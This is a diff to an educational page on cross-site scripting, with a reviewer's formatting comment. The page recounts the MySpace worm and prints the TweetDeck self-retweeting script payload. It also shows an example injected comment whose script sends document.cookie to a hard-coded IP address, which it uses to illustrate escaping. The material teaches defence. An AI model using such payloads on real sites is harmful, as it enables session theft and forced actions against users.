contents/security/crossSiteScripting/crossSiteScripting.md

```diff
@@ -76,35 +99,102 @@ However, that also means that hackers are able to also include scripts in their
 
-## Preventing Cross Site Scripting
+## Well-Known XSS Incidents
+
+**MySpace Worm**
+
+In 2005, MySpace allowed users to customise their profiles using HTML code. This allowed for diversity of profiles but also allowed Samy Kamkar to find an XSS vulnerability. 
+
+Samy Kamkar wrote a script which made people who visited his profile send him a friend request, and list Samy’s in their own profile’s “My Heroes” section. Not only that, he also programmed the script to copy itself onto the visitor's profile. Within a day, he had 1 million friend requests. 
+
+This caused MySpace to take the site offline to figure out what was going on and to purge the worm. 
+
+You can read the detailed article <a href="https://motherboard.vice.com/en_us/article/wnjwb4/the-myspace-worm-that-changed-the-internet-forever" target="_blank">here</a>.
+
+**Self-Retweeting Tweet**
+
+In 2014, a tweet became the world's first retweeting tweet. Twitter itself has security measures against XSS and is thus unaffected. However, users on TweetDeck (Twitter social media dashboard application) that came across this tweet will automatically retweet this tweet:
+
+```html
+<script class="xss">
+$('.xss').parents().eq(1).find('a').eq(1).click();
+$('[data-action=retweet]').click();
+alert('XSS in Tweetdeck')
+</script> ♥
+```
+
+The first line selects the retweet button and then clicks it, and the second line confirms the action by clicking ok on the modal tht confirms the retweet. A TweetDeck user who saw this tweet will only see "♥", the script portion is executed by the browser on the script. Without `alert()`, the TweetDeck user will not even notice anything.
+
+You can still see this tweet <a href="https://twitter.com/dergeruhn/status/476764918763749376?lang=en" target="_blank">here</a>.
+
+## How to prevent XSS?
 
 There are a couple of ways to prevent your website against XSS. The two most
 common ways are:
 
-* Escaping String Input: By converting legal HTML characters to their
+**Escaping String Input** <br>
+By converting legal HTML characters to their
 display-equivalent (e.g. `<` to `&lt;`), you prevent the symbol from being
 parsed as HTML. It now even shows the content on the screen (in case the actual
 intention is to actually show someone how to code for example).
+In the above example, the comment section will become like this: 
+> **Comments Section** <br>
+That's a very nice picture! <br>
+Good photograph! <br>
+I **like** your photograph! <br>
+This is an innocent looking comment. `<script>sendToServer("http://139.241.0.3/", document.cookie)</script>`
+
+The `<script>` and `</script>` will be displayed as text rather than being run as `JavaScript` by the browser.
 
-* Whitelist Sanitization: By scanning and parsing the input as HTML, you can
+**Whitelist Sanitization** <br>
+By scanning and parsing the input as HTML, you can
 remove undesired HTML elements, and only allowing certain whitelisted HTML
 elements to be used (e.g. whitelisting only `<b>` and `<i>`).
```

Comment:
Give the two techniques as a bullet/numbered list?

Reply:
Changed